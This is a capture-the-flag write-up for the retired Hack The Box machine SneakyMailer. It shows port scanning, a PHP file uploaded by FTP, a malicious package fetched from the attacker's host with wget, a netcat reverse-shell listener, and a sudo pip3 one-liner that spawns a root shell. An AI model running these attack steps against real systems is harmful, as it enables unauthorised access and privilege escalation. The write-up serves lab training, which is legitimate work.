Hackthebox — SneakyMailer

Summary

Today we have another linux machine is retired with IP 10.10.10.197

Enumeration

root@strike:~# nmap -sC -sV 10.10.10.197
Starting Nmap 7.70 ( https://nmap.org ) at 2020-07-12 17:40 EET
Nmap scan report for 10.10.10.197
Host is up (0.11s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 57:c9:00:35:36:56:e6:6f:f6:de:86:40:b2:ee:3e:fd (RSA)
| 256 d8:21:23:28:1d:b8:30:46:e2:67:2d:59:65:f0:0a:05 (ECDSA)
|_ 256 5e:4f:23:4e:d4:90:8e:e9:5e:89:74:b3:19:0c:fc:1a (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Did not follow redirect to http://sneakycorp.htb
143/tcp open imap Courier Imapd (released 2018)
|_imap-capabilities: STARTTLS NAMESPACE UTF8=ACCEPTA0001 UIDPLUS ENABLE ACL IDLE THREAD=REFERENCES ACL2=UNION THREAD=ORDEREDSUBJECT completed IMAP4rev1 CAPABILITY OK SORT CHILDREN QUOTA
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after: 2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imap Courier Imapd (released 2018)
|_imap-capabilities: NAMESPACE UTF8=ACCEPTA0001 UIDPLUS AUTH=PLAIN ACL IDLE THREAD=REFERENCES ACL2=UNION THREAD=ORDEREDSUBJECT completed CAPABILITY IMAP4rev1 OK ENABLE SORT CHILDREN QUOTA
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after: 2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
8080/tcp open http nginx 1.14.2
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to nginx!
Service Info: Host: debian; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.70 seconds
root@strike:~#

We have many ports open for linux machine!

I found page team.php

I tried to Connect to ftp service with developer credentials and upload secwalk.php file to dev directory

root@strike:~# ftp 10.10.10.197
Connected to 10.10.10.197.
220 (vsFTPd 3.0.3)
Name (10.10.10.197:root): developer
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd dev
250 Directory successfully changed.
ftp> mput secwalk.php
mput secwalk.php? yes
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5490 bytes sent in 0.00 secs (54.5382 MB/s)
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 May 26 19:52 css
drwxr-xr-x 2 0 0 4096 May 26 19:52 img
-rwxr-xr-x 1 0 0 13742 Jun 23 09:44 index.php
drwxr-xr-x 3 0 0 4096 May 26 19:52 js
drwxr-xr-x 2 0 0 4096 May 26 19:52 pypi
drwxr-xr-x 4 0 0 4096 May 26 19:52 scss
--wxrw-rw- 1 1001 1001 5490 Jul 16 10:40 secwalk.php
-rwxr-xr-x 1 0 0 26523 May 26 20:58 team.php
drwxr-xr-x 8 0 0 4096 May 26 19:52 vendor
226 Directory send OK.
ftp>

Open the file in browser
Listening on port 4142 to get connection

After create two files on our Desktop, We need to upload this files to the machine

developer@sneakymailer:/tmp$ wget -r --no-parent http://10.10.15.33:8000/pypi-pkg
<get -r --no-parent http://10.10.15.33:8000/pypi-pkg
--2020-07-16 10:42:48-- http://10.10.15.33:8000/pypi-pkg
Connecting to 10.10.15.33:8000... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: /pypi-pkg/ [following]
--2020-07-16 10:42:49-- http://10.10.15.33:8000/pypi-pkg/
Connecting to 10.10.15.33:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 266 [text/html]
Saving to: ‘10.10.15.33:8000/pypi-pkg’

10.10.15. 0%[ ] 0 --.-KB/s 10.10.15.33:8000/py 100%[===================>] 266 --.-KB/s in 0s

2020-07-16 10:42:49 (6.19 MB/s) - ‘10.10.15.33:8000/pypi-pkg’ saved [266/266]

Loading robots.txt; please ignore errors.
--2020-07-16 10:42:49-- http://10.10.15.33:8000/robots.txt
Connecting to 10.10.15.33:8000... connected.
HTTP request sent, awaiting response... 404 File not found
2020-07-16 10:42:49 ERROR 404: File not found.

--2020-07-16 10:42:49-- http://10.10.15.33:8000/pypi-pkg/.pypirc
Connecting to 10.10.15.33:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 128 [application/octet-stream]
Saving to: ‘10.10.15.33:8000/pypi-pkg/.pypirc’

10.10.15. 0%[ ] 0 --.-KB/s 10.10.15.33:8000/py 100%[===================>] 128 --.-KB/s in 0s

2020-07-16 10:42:49 (3.21 MB/s) - ‘10.10.15.33:8000/pypi-pkg/.pypirc’ saved [128/128]

--2020-07-16 10:42:49-- http://10.10.15.33:8000/pypi-pkg/setup.py
Connecting to 10.10.15.33:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 565 [text/plain]
Saving to: ‘10.10.15.33:8000/pypi-pkg/setup.py’

10.10.15. 0%[ ] 0 --.-KB/s 10.10.15.33:8000/py 100%[===================>] 565 --.-KB/s in 0s

2020-07-16 10:42:49 (14.4 MB/s) - ‘10.10.15.33:8000/pypi-pkg/setup.py’ saved [565/565]

FINISHED --2020-07-16 10:42:49--
Total wall clock time: 1.0s
Downloaded: 3 files, 959 in 0s (7.86 MB/s)

There is the files

developer@sneakymailer:/tmp$ ls
ls
10.10.15.33:8000
systemd-private-859f3cb0b4ff454aab770ad4a719628d-systemd-timesyncd.service-CZ3mlI
vmware-root_458-834774610
developer@sneakymailer:/tmp$ cd 10.10.15.33:8000
cd 10.10.15.33:8000
developer@sneakymailer:/tmp/10.10.15.33:8000$ ls
ls
pypi-pkg
developer@sneakymailer:/tmp/10.10.15.33:8000$ cd pypi-pkg
cd pypi-pkg
developer@sneakymailer:/tmp/10.10.15.33:8000/pypi-pkg$ ls -a
ls -a
. .. setup.py .pypirc

We need to listen to port 2345 to get low privilege

root@strike:~# nc -lnvp 2345
listening on [any] 2345 ...

Now we need to execute the package

And we got the shell

Gain user flag!

Privilege Escalation

low@sneakymailer:~$ sudo -l
sudo -l
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Matching Defaults entries for low on sneakymailer:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User low may run the following commands on sneakymailer:
(root) NOPASSWD: /usr/bin/pip3
low@sneakymailer:~$

After searching i found blog to abuse the pip3
Link

low@sneakymailer:~$ TF=$(mktemp -d)
TF=$(mktemp -d)
low@sneakymailer:~$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
low@sneakymailer:~$ sudo pip3 install $TF
sudo pip3 install $TF
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Processing /tmp/tmp.tQid5dJuNf
# bash
root@sneakymailer:/tmp/pip-req-build-9k8kjhct#

Gain root flag!

If u learn any thing useful from write up, Respect me on HackTheBox

Thx for ur time!

CTFer | Computer Science Student